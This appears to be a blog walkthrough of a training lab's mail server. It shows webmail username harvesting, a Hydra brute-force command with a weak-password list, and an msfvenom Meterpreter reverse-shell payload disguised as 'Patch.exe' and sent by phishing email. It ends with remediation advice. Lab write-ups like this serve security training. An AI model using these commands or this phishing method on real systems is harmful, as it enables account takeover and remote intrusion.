Throwback — Part 2 — Mail Server

The is the second article to Throwback lab. In this article we will dig deaper into how to intial exploit the Throwback mail server.

Web UI

After the Nmap scan in Part 1, we could identify that the 10.200.70.232 is a mail server. The mail server has also a web UI running on port 80:

As you can see from the screenshot, there is a default account called tbhguest and the credentials are given to us. We can login to the account and read the email and retrieve the flag:

Also we can retrieve a list of usernames and emails by going to the adresses page:

Brute Force

After retrieving a list of nicknames, I have created a file called users.txt and put these nicknames into it. Also I have created a list of passwords called passwords.txt and put the following content in it:

securitycenter
Summer2020
Management2020
Management2018
Password2020
Throwback2020
Password123

Next I have brute forced the login page with Hydra:

hydra -L users.txt -P passwords.txt 10.200.70.232 http-post-form '/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=incorrect' -v

After waiting 2 minutes I had the login for 6 additional accounts:

One of the accounts (MurphyF) has received an interesting email, which allows us to reset his credentials on the Timekeep server to murphyf:PASSWORD:

But we will come to that in an upcoming article.

Phishing

As we have a list of email accounts, the next logical step of this engagement was to phish these users. For this purpose I have created a meterpreter reverse shell on renamed it to “Patch.exe”:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.71.46 LPORT=1234 -f exe > NotAShell.exemv NotAShell.exe Patch.exe

After that I have created a meterpreter multi/handler to handle incoming request from compromised hosts:

The next step was creating a phishing mail. I have just used the guest account to send the following email. I have attached the reverse shell as attachment:

After waiting for a while, I could catch a reverse shell from 10.200.70.222 (THROWBACK-WS01) from BlaireJ.

Remediation

There should not be a guest account to access the webmail. If it is needed it should be restricted to the bare minimum of privileges. Also the compromised users should change their passwords to more complex ones. The mail server should be configured with a more advanced password policy: Using Uppercase and Lowercase letters, symbols and numbers and a minimum of 12 characters. Also users that fell victim to phishing should receive an awareness training.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store